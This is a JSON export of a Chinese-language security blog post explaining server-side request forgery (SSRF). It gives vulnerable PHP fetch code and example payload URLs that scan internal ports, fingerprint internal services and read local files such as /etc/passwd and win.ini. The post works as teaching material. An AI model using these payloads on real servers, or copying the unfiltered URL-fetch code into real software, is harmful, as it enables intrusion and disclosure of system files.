{"id":235,"date":"2020-08-10T15:39:42","date_gmt":"2020-08-10T07:39:42","guid":{"rendered":"http:\/\/note.systw.net\/note\/?p=235"},"modified":"2024-02-17T20:20:56","modified_gmt":"2024-02-17T12:20:56","slug":"ssrf","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/235","title":{"rendered":"SSRF"},"content":{"rendered":"\n<div class=\"wp-block-jetpack-markdown\"><h3>SSRF(Server-Side Request Forgery:\u670d\u52d9\u7aef\u8acb\u6c42\u507d\u9020)<\/h3>\n<p>\u7531\u653b\u64ca\u8005\u900f\u904e\u670d\u52d9\u7aef\u767c\u51fa\u8acb\u6c42\u7684\u4e00\u7a2e\u5b89\u5168\u5f31\u9ede\uff0c\u901a\u5e38SSRF\u7684\u653b\u64ca\u76ee\u6a19\u662f\u5916\u7db2\u7121\u6cd5\u5b58\u53d6\u7684\u5167\u7db2\u7cfb\u7d71\uff0c\u56e0\u70ba\u653b\u64ca\u662f\u7531\u670d\u52d9\u7aef\u767c\u8d77\u7684\uff0c\u6240\u4ee5\u53ef\u4ee5\u9023\u5230\u5916\u7db2\u7121\u6cd5\u63a5\u89f8\u7684\u5167\u7db2\u7cfb\u7d71\u3002<br>\n\u9019\u985e\u6709\u5f31\u9ede\u7684\u7db2\u7ad9\u670d\u52d9\u4e3b\u8981\u63d0\u4f9b\u8207\u5176\u4ed6\u4e3b\u6a5f\u4e92\u52d5\u7684\u529f\u80fd\uff0c\u8b93\u4f7f\u7528\u8005\u6307\u5b9aurl\u5f97\u5230\u5716\u7247\u6216\u4e0b\u8f09\u8b80\u53d6\u6587\u4ef6\u7b49\u3002<\/p>\n<p>\u00a0<\/p>\n<h3>\u5bb9\u6613\u51fa\u73feSSRF\u7684\u670d\u52d9<\/h3>\n<p>\u6703\u5c0d\u7528\u6236\u6307\u5b9a\u7684URL\u4e2d\u7684\u5716\u7247\u6587\u4ef6html\u7b49\u505a\u8655\u7406\uff0c\u4e26\u63d0\u4f9b\u76f8\u95dc\u61c9\u7528\u7684\u670d\u52d9<br>\n\u5982\u679c\u9019\u4e9b\u670d\u52d9\u6c92\u6709\u5c0dURL\u505a\u904e\u6ffe\u6216\u969f\u5236\uff0c\u5c31\u6703\u5b58\u5728SSRF\u5f31\u9ede<br>\nex:<br>\n\u7db2\u9801\u5206\u4eab\uff1a\u900f\u904eURL\u5206\u4eab\u7db2\u9801\u5167\u5bb9<br>\n\u8f49\u78bc\u670d\u52d9\uff1a\u900f\u904eURL\u628a\u539f\u4f4d\u7f6e\u7684\u7db2\u9801\u5167\u5bb9\u512a\u5316\u8abf\u6574\u6210\u9069\u5408\u624b\u6a5f\u89c0\u770b<br>\n\u7dda\u4e0a\u7ffb\u8b6f\uff1a\u7ffb\u8b6fURL\u6307\u5b9a\u7684\u4f4d\u7f6e<br>\n\u5716\u7247\u4e0b\u8f09\uff1a\u900f\u904eURL\u4f4d\u7f6e\u4e0b\u8f09\u5716\u7247<br>\n\u5716\u7247\u6587\u7ae0\u6536\u85cf\u529f\u80fd\uff1a\u900f\u904eURL\u5206\u4eab\u6536\u85cf\u56fe\u7247\u548c\u6587\u7ae0<br>\n\u5176\u4ed6\u6703\u547c\u53ebURL\u7684\u529f\u80fd<\/p>\n<p>\u00a0<\/p>\n<hr>\n<h3>\u5229\u7528SSRF\u653b\u64ca\u7bc4\u4f8b<\/h3>\n<p>\u5047\u8a2d\u6b63\u5e38\u529f\u80fd\u5982\u4e0b<br>\nhttp:\/\/testweb\/test.php \u53d6\u5f97\u7528\u6236\u63d0\u4f9b\u7684URL\uff0c\u4e26\u628aURL\u7684\u5167\u5bb9\u986f\u793a\u5230\u7db2\u9801\u4e0a\uff0c<br>\n\u539f\u78bc\u5982\u4e0b<\/p>\n<pre><code>if (isset($_GET['url']))\n{\n  $link = $_GET['url'];\n  $curlobj = curl_init();\n  curl_setopt($curlobj, CURLOPT_POST, 0);\n  curl_setopt($curlobj,CURLOPT_URL,$link);\n  curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);\n  $result=curl_exec($curlobj);\n  curl_close($curlobj);\n  $filename = '\/curled\/'.rand().'.txt';\n  file_put_contents($filename, $result);\n  echo $result;\n}\n?&gt;\n<\/code><\/pre>\n<p>\u6b63\u5e38\u4f7f\u7528\u65b9\u6cd5<br>\nhttp:\/\/testweb\/test.php?url=www.google.com<br>\n\u7528\u6236\u5728URL\u8f38\u5165www.google.com,\u7528\u6236\u9801\u9762\u6703\u8f38\u51fagoogle\u7684\u756b\u9762<\/p>\n<h4>\u653b\u64ca\u65b9\u6cd51\uff0c\u6383\u63cf\u5167\u7db2\u57e0<\/h4>\n<p>http:\/\/testweb\/test.php?url=http:\/\/landb:22<br>\nhttp:\/\/testweb\/test.php?url=http:\/\/landb:25<br>\nhttp:\/\/testweb\/test.php?url=http:\/\/landb:3306<br>\n\u6839\u64da\u56de\u61c9\u7684banner\u8a0a\u606f\uff0c\u932f\u8aa4\u8cc7\u8a0a\uff0c\u56de\u61c9\u6642\u9593\uff0c\u5c01\u5305\u5927\u5c0f\u5224\u65b7\u8a72\u57e0\u662f\u5426\u6709\u958b\u653e<\/p>\n<h4>\u653b\u64ca\u65b9\u6cd52\uff0c\u5c0d\u5167\u7db2WEB\u61c9\u7528\u505afingerprint<\/h4>\n<p>\u5224\u65b7\u662f\u5426\u6709phpMyAdmin<br>\nhttp:\/\/testweb\/test.php?url=http:\/\/lanserver\/phpMyAdmin\/themes\/original\/img\/b_tblimport.png<br>\n\u5224\u65b7\u662f\u5426\u70baDlink\u8a2d\u5099<br>\nhttp:\/\/testweb\/test.php?url=http:\/\/lanserver\/portName.js<br>\n\u5224\u65b7\u662f\u5426\u70baTomcat<br>\nhttp:\/\/testweb\/test.php?url=http:\/\/lanserver:8080\/manager\/images\/tomcat.gif<\/p>\n<h4>\u653b\u64ca\u65b9\u6cd53\uff0c\u8b80\u53d6\u672c\u5730\u6a94\u6848<\/h4>\n<p>\u5c07URL\u63db\u6210file:\/\/\u7684\u5f62\u5f0f\u8b80\u53d6\u672c\u5730\u6a94\u6848<br>\n\u8b80\u53d6win.ini<br>\n<code>http:\/\/testweb\/test.php?url=file:\/\/\/C:\/Windows\/win.ini<\/code><br>\n\u8b80\u53d6passwd<br>\n<code>http:\/\/testweb\/test.php?url=file:\/\/\/etc\/passwd<\/code><\/p>\n<p>\u00a0<\/p>\n<hr>\n<h3>\u5176\u4ed6\u53ef\u80fd\u51fa\u554f\u984c\u7684\u4ee3\u78bc\u7bc4\u4f8b<\/h3>\n<p>\u4f7f\u7528file_get_contents\u51fd\u6578\uff0c\u5f9e\u7528\u6236\u6307\u5b9a\u7684URL\u53d6\u5f97\u4e26\u4fdd\u7559\u5716\u7247\uff0c\u7136\u5f8c\u986f\u793a\u7d66\u7528\u6236<\/p>\n<pre><code>if (isset($_POST['url']))\n{\n  $content = file_get_contents($_POST['url']);\n  $filename ='\/images\/'.rand().'.jpg';\n  file_put_contents($filename, $content);\n  echo $_POST['url'];\n  $img = '&lt; img src=&quot;.$filename.&quot;\/&gt;';\n}\necho $img;\n?&gt;\n<\/code><\/pre>\n<p>\u4f7f\u7528fsockopen\u51fd\u6578\u53d6\u5f97\u7528\u6236\u6307\u5b9a\u7684URL\u5167\u5bb9\uff0c\u4e26\u5c07\u5f97\u5230\u7684\u6578\u64da\u986f\u793a\u51fa\u4f86<\/p>\n<pre><code>$fp = fsockopen($host, intval($port), $errno, $errstr, 30);\nif (!$fp) {\n  echo &quot;$errstr (error number $errno) n&quot;;\n} else {\n  $out = &quot;GET $link HTTP\/1.1rn&quot;;\n  $out .= &quot;Host: $hostrn&quot;;\n  $out .= &quot;Connection: Closernrn&quot;;\n  $out .= &quot;rn&quot;;\n  fwrite($fp, $out);\n  $contents='';\n  while (!feof($fp))$contents.= fgets($fp, 1024);\n  fclose($fp);\n  echo $contents;\n}\n?&gt;\n<\/code><\/pre>\n<p>\u00a0<\/p>\n<p>refer<br>\nhttps:\/\/wizardforcel.gitbooks.io\/mst-sec-lecture-notes\/content\/%E6%BC%8F%E6%B4%9E%E7%AF%87%20SSRF.html<br>\nhttps:\/\/www.freebuf.com\/articles\/web\/20407.html<br>\nhttps:\/\/blog.csdn.net\/lionzl\/article\/details\/100570193?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.channel_param&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.channel_param<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[38],"tags":[],"class_list":["post-235","post","type-post","status-publish","format-standard","hentry","category-serverside"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":1224,"url":"https:\/\/systw.net\/note\/archives\/1224","url_meta":{"origin":235,"position":0},"title":"SSRF defense bypass","author":"raymond","date":"2023 \u5e74 2 \u6708 9 \u65e5","format":false,"excerpt":"SSRF\u653b\u64ca\u7684\u9632\u79a6\u63aa\u65bd\u5f88\u5e38\u898b\uff0c\u4f46\u5927\u90e8\u4efd\u53ef\u4ee5\u9952\u904e \u7576\u5b89\u5168\u9650\u5236\u5c01\u9396127.0.0.1\u6216localhost\u2026","rel":"","context":"\u5728\u300cServerSide\u300d\u4e2d","block_context":{"text":"ServerSide","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/serverside"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1193,"url":"https:\/\/systw.net\/note\/archives\/1193","url_meta":{"origin":235,"position":1},"title":"XXE","author":"raymond","date":"2023 \u5e74 2 \u6708 4 \u65e5","format":false,"excerpt":"XXE\uff0c\u5168\u540dXML eXternal Entity Injection\uff0cXML\u5916\u90e8\u5be6\u9ad4\u6ce8\u5165\u3002 \u4ee5XM\u2026","rel":"","context":"\u5728\u300cServerSide\u300d\u4e2d","block_context":{"text":"ServerSide","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/serverside"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1493,"url":"https:\/\/systw.net\/note\/archives\/1493","url_meta":{"origin":235,"position":2},"title":"OAuth OpenID Connect\u00a0","author":"raymond","date":"2023 \u5e74 3 \u6708 28 \u65e5","format":false,"excerpt":"OpenID Connect\u64f4\u5c55\u4e86OAuth\u5354\u8b70\uff0c\u63d0\u4f9b\u4e00\u4e9b\u529f\u80fd\u53ef\u4ee5\u66f4\u597d\u5730\u652f\u63f4OAuth\u7684\u8eab\u4efd\u9a57\u8b49\u3002\u5982\u2026","rel":"","context":"\u5728\u300cLogic Vulnerabilities\u300d\u4e2d","block_context":{"text":"Logic Vulnerabilities","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/logic-vulnerabilities"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1084,"url":"https:\/\/systw.net\/note\/archives\/1084","url_meta":{"origin":235,"position":3},"title":"HTB WS-Todo","author":"raymond","date":"2024 \u5e74 1 \u6708 7 \u65e5","format":false,"excerpt":"\u900f\u904eSSRF\u8a2a\u554f\u6709XSS\u5f31\u9ede\u7684\u9801\u9762\uff0c\u8f09\u5165\u60e1\u610f\u4ee3\u78bc\u4ee3\u78bc\u53d6\u5f97\u52a0\u5bc6\u4fe1\u606f\uff0c\u5728\u900f\u904e\u8f38\u5165\u8d85\u9577\u5167\u5bb9\u5c0e\u81f4\u5bc6\u9470\u53ef\u63a7\uff0c\u4ee5\u2026","rel":"","context":"\u5728\u300c\u653b\u64ca\u624b\u6cd5\u300d\u4e2d","block_context":{"text":"\u653b\u64ca\u624b\u6cd5","link":"https:\/\/systw.net\/note\/archives\/category\/hackerskill"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/i.imgur.com\/6oRY0sd.jpg?fit=1024%2C1024&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/i.imgur.com\/6oRY0sd.jpg?fit=1024%2C1024&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/i.imgur.com\/6oRY0sd.jpg?fit=1024%2C1024&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/i.imgur.com\/6oRY0sd.jpg?fit=1024%2C1024&ssl=1&resize=700%2C400 2x"},"classes":[]},{"id":1137,"url":"https:\/\/systw.net\/note\/archives\/1137","url_meta":{"origin":235,"position":4},"title":"HOST header attack","author":"raymond","date":"2023 \u5e74 1 \u6708 20 \u65e5","format":false,"excerpt":"Host header\u7684\u76ee\u7684\u662f\u5e6b\u52a9\u8b58\u5225\u5ba2\u6236\u7aef\u60f3\u8981\u8207\u54ea\u500b\u5f8c\u7aef\u5143\u4ef6\u9032\u884c\u901a\u8a0a\uff0c\u7279\u5225\u662f\u540c\u4e00 IP \u4f4d\u5740\u5b58\u53d6\u591a\u2026","rel":"","context":"\u5728\u300cLogic Vulnerabilities\u300d\u4e2d","block_context":{"text":"Logic Vulnerabilities","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/logic-vulnerabilities"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":2483,"url":"https:\/\/systw.net\/note\/archives\/2483","url_meta":{"origin":235,"position":5},"title":"OWASP Top 10 2021","author":"raymond","date":"2024 \u5e74 8 \u6708 3 \u65e5","format":false,"excerpt":"OWASP Top 10\u662f\u4e00\u4efd\u7531\u958b\u653e\u5f0f\u7db2\u8def\u61c9\u7528\u5b89\u5168\u8a08\u756b\u5236\u5b9a\u7684\u7db2\u8def\u61c9\u7528\u7a0b\u5f0f\u5b89\u5168\u98a8\u96aa\u6e05\u55ae\uff0c\u6db5\u84cb\u5b58\u53d6\u63a7\u5236\u5931\u2026","rel":"","context":"\u5728\u300cConcept\u300d\u4e2d","block_context":{"text":"Concept","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/concept"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/235","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=235"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/235\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=235"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=235"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=235"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}